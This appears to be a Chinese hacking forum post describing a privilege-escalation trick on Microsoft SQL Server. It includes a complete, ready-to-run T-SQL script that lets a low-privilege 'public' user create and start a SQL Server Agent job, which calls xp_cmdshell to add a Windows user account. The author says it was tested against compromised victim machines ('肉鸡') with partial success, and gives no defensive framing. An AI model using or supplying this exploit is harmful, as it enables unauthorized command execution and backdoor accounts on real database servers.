public权限执行系统命令

最早1986提出的access数据库执行系统命令，结果忽悠了一圈人 哈哈 不过这个public权限执行系统命令也算是个鸡肋…. YY 一下 安慰一下被我忽悠的同志们

很多朋友说public权限不能执行命令 其实是可以执行的~ 但是前提是启动 Sql server Agent 服务

其实SQL Server Agent 是一个任务规划器和警报管理器 默认安装 sql server是不开启的

不过我上午测试十个肉鸡成功了三四次。 看来有的管理员还是需要这个东西来提供报警的

其实就是利用MSSQL的作业处理也是可以执行命令 但是在@server_name要指定你的sql的服务器名



SQL Server Agent 这服务必须开启

开启服务后进入查询分析器. 这里我是用新建的public用户

首先 Select host_name() 获取当前库服务器机器名

然后在查询分析器执行下面的代码
USE msdb

EXEC sp_add_job @job_name = 'GetSystemOnSQL',

@enabled = 1,

@delete_level = 1

EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',

@step_name = 'Exec my sql',

@subsystem = 'TSQL',

@command = 'exec master..xp_execresultset N''select ''''exec

master..xp_cmdshell "net user iisloger hook /add> c:\fish.txt"'''''',N''Master'''

EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',

@server_name = '这里是你的SQL服务器名'

EXEC sp_start_job @job_name = 'GetSystemOnSQL'

代码测试可用！！！！